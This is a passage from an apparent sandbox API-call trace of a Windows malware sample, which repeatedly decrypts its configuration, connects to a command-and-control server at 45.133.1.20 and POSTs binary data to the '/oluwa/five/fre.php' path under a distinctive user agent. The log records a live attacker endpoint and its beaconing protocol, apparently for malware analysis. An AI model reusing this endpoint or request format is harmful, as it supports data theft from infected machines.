ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.463] GetProcessHeap () returned 0x6a0000 [0230.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0230.463] GetProcessHeap () returned 0x6a0000 [0230.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.464] GetProcessHeap () returned 0x6a0000 [0230.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0230.464] GetProcessHeap () returned 0x6a0000 [0230.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0230.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0230.484] GetProcessHeap () returned 0x6a0000 [0230.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0230.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.486] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0230.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.487] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.488] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.488] GetProcessHeap () returned 0x6a0000 [0230.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0230.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.493] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0230.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.494] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0230.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.495] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0230.495] GetProcessHeap () returned 0x6a0000 [0230.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.497] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0230.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.498] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0230.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.499] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0230.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.501] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0230.501] GetProcessHeap () returned 0x6a0000 [0230.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0230.501] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0230.501] GetProcessHeap () returned 0x6a0000 [0230.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0230.501] socket (af=2, type=1, protocol=6) returned 0x700 [0230.501] connect (s=0x700, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0230.527] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0230.527] GetProcessHeap () returned 0x6a0000 [0230.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0230.527] GetProcessHeap () returned 0x6a0000 [0230.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0230.528] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.529] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.529] GetProcessHeap () returned 0x6a0000 [0230.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8f40 [0230.529] GetProcessHeap () returned 0x6a0000 [0230.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.530] GetProcessHeap () returned 0x6a0000 [0230.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0230.530] GetProcessHeap () returned 0x6a0000 [0230.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0230.531] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.532] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.532] GetProcessHeap () returned 0x6a0000 [0230.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0230.532] GetProcessHeap () returned 0x6a0000 [0230.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.533] send (s=0x700, buf=0x6bd460*, len=242, flags=0) returned 242 [0230.534] send (s=0x700, buf=0x6bb998*, len=159, flags=0) returned 159 [0230.534] GetProcessHeap () returned 0x6a0000 [0230.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0230.534] recv (in: s=0x700, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0230.618] GetProcessHeap () returned 0x6a0000 [0230.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0230.619] GetProcessHeap () returned 0x6a0000 [0230.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0230.620] GetProcessHeap () returned 0x6a0000 [0230.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f40 | out: hHeap=0x6a0000) returned 1 [0230.621] GetProcessHeap () returned 0x6a0000 [0230.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0230.621] closesocket (s=0x700) returned 0 [0230.622] GetProcessHeap () returned 0x6a0000 [0230.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0230.622] GetProcessHeap () returned 0x6a0000 [0230.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.622] GetProcessHeap () returned 0x6a0000 [0230.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0230.623] GetProcessHeap () returned 0x6a0000 [0230.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0230.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1428) returned 0x700 [0230.627] Sleep (dwMilliseconds=0xea60) [0230.628] GetProcessHeap () returned 0x6a0000 [0230.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0230.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.635] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0230.669] GetProcessHeap () returned 0x6a0000 [0230.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0230.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.671] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0230.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.688] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.693] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.693] GetProcessHeap () returned 0x6a0000 [0230.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0230.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.695] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0230.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.704] CryptDestroyKey (hKey=0x6ad020) returned 1 [0230.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.705] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0230.705] GetProcessHeap () returned 0x6a0000 [0230.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.707] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.708] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.709] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.711] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.711] GetProcessHeap () returned 0x6a0000 [0230.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0230.711] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.711] GetProcessHeap () returned 0x6a0000 [0230.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0230.712] GetProcessHeap () returned 0x6a0000 [0230.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.713] GetProcessHeap () returned 0x6a0000 [0230.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0230.714] GetProcessHeap () returned 0x6a0000 [0230.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0230.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.726] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0230.738] GetProcessHeap () returned 0x6a0000 [0230.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0230.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.739] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0230.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.741] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.742] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.742] GetProcessHeap () returned 0x6a0000 [0230.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0230.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.748] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0230.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.749] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0230.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.750] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0230.750] GetProcessHeap () returned 0x6a0000 [0230.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.752] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0230.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.753] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0230.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.756] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0230.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.757] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0230.757] GetProcessHeap () returned 0x6a0000 [0230.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0230.758] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0230.758] GetProcessHeap () returned 0x6a0000 [0230.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0230.758] socket (af=2, type=1, protocol=6) returned 0x704 [0230.800] connect (s=0x704, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0230.824] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0230.824] GetProcessHeap () returned 0x6a0000 [0230.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0230.824] GetProcessHeap () returned 0x6a0000 [0230.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0230.825] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.826] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.826] GetProcessHeap () returned 0x6a0000 [0230.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9cc0 [0230.826] GetProcessHeap () returned 0x6a0000 [0230.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.828] GetProcessHeap () returned 0x6a0000 [0230.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0230.828] GetProcessHeap () returned 0x6a0000 [0230.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0230.829] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.830] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.830] GetProcessHeap () returned 0x6a0000 [0230.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0230.830] GetProcessHeap () returned 0x6a0000 [0230.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.830] send (s=0x704, buf=0x6bd460*, len=242, flags=0) returned 242 [0230.831] send (s=0x704, buf=0x6bb998*, len=159, flags=0) returned 159 [0230.831] GetProcessHeap () returned 0x6a0000 [0230.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0230.831] recv (in: s=0x704, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0230.920] GetProcessHeap () returned 0x6a0000 [0230.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0230.921] GetProcessHeap () returned 0x6a0000 [0230.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0230.921] GetProcessHeap () returned 0x6a0000 [0230.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9cc0 | out: hHeap=0x6a0000) returned 1 [0230.922] GetProcessHeap () returned 0x6a0000 [0230.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0230.922] closesocket (s=0x704) returned 0 [0230.923] GetProcessHeap () returned 0x6a0000 [0230.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0230.923] GetProcessHeap () returned 0x6a0000 [0230.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.923] GetProcessHeap () returned 0x6a0000 [0230.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0230.923] GetProcessHeap () returned 0x6a0000 [0230.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0230.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1438) returned 0x704 [0230.926] Sleep (dwMilliseconds=0xea60) [0230.927] GetProcessHeap () returned 0x6a0000 [0230.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0230.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.936] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0230.943] GetProcessHeap () returned 0x6a0000 [0230.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba4a0 [0230.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.946] CryptImportKey (in: hProv=0x6bf278, pbData=0x6ba4a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0230.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.947] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.948] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.948] GetProcessHeap () returned 0x6a0000 [0230.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba4a0 | out: hHeap=0x6a0000) returned 1 [0230.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.950] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0230.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.951] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0230.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.952] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0230.952] GetProcessHeap () returned 0x6a0000 [0230.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.953] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.954] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.959] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.961] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.961] GetProcessHeap () returned 0x6a0000 [0230.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0230.961] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.961] GetProcessHeap () returned 0x6a0000 [0230.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0230.966] GetProcessHeap () returned 0x6a0000 [0230.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.967] GetProcessHeap () returned 0x6a0000 [0230.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0230.967] GetProcessHeap () returned 0x6a0000 [0230.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0230.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.968] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, 